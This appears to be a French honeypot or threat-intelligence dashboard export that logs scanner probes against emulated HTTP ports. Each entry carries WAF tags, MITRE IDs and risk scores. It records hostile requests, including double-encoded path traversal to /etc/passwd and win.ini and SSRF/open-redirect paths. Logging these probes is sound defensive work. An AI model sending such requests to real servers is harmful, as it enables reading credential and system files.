Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8888 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8888 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X |
|||||||
| TCP | 8888 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8888 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8888 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8888 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | SSRF interne ssrf internal · via HTTP:8880 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | SSRF interne ssrf internal · via HTTP:8880 · (tentative d'exploit) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 57 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 57
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozi
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8880 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8880 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8880 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8880
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:8880 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8501 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8501 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X |
|||||||
| TCP | 8501 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8501 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac |
|||||||
| TCP | 8501 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8501 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: 62.3.50.33:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537. |
|||||||
| TCP | 8501 · HTTP | http | SSRF interne ssrf internal · via HTTP:8501 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8501 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8501 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8501
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: 62.3.50.33:8501 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (K |
|||||||
| TCP | 8200 · HTTP | http | SSRF interne ssrf internal · via HTTP:8200 · (tentative d'exploit) · → /%5cgoogle.com/4af206ebd4.html | Élevée | Moyen · 58 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /%5cgoogle.com/4af206ebd4.html UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/%5cgoogle.com/4af206ebd4.html
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/%5cgoogle.com/4af206ebd4.html
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: 62.3.50.33:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac O
Requête brute (extrait)
GET /%5cgoogle.com/4af206ebd4.html HTTP/1.1 Host: 62.3.50.33:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8200 · HTTP | http | SSRF interne ssrf internal · via HTTP:8200 · (tentative d'exploit) · → /http%3A%2F%2Fw00te8b527c1d.com | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /http%3A%2F%2Fw00te8b527c1d.com UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/http%3A%2F%2Fw00te8b527c1d.com
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/http%3A%2F%2Fw00te8b527c1d.com
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 64
Confiance : Confiance 54 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
Payload (extrait)
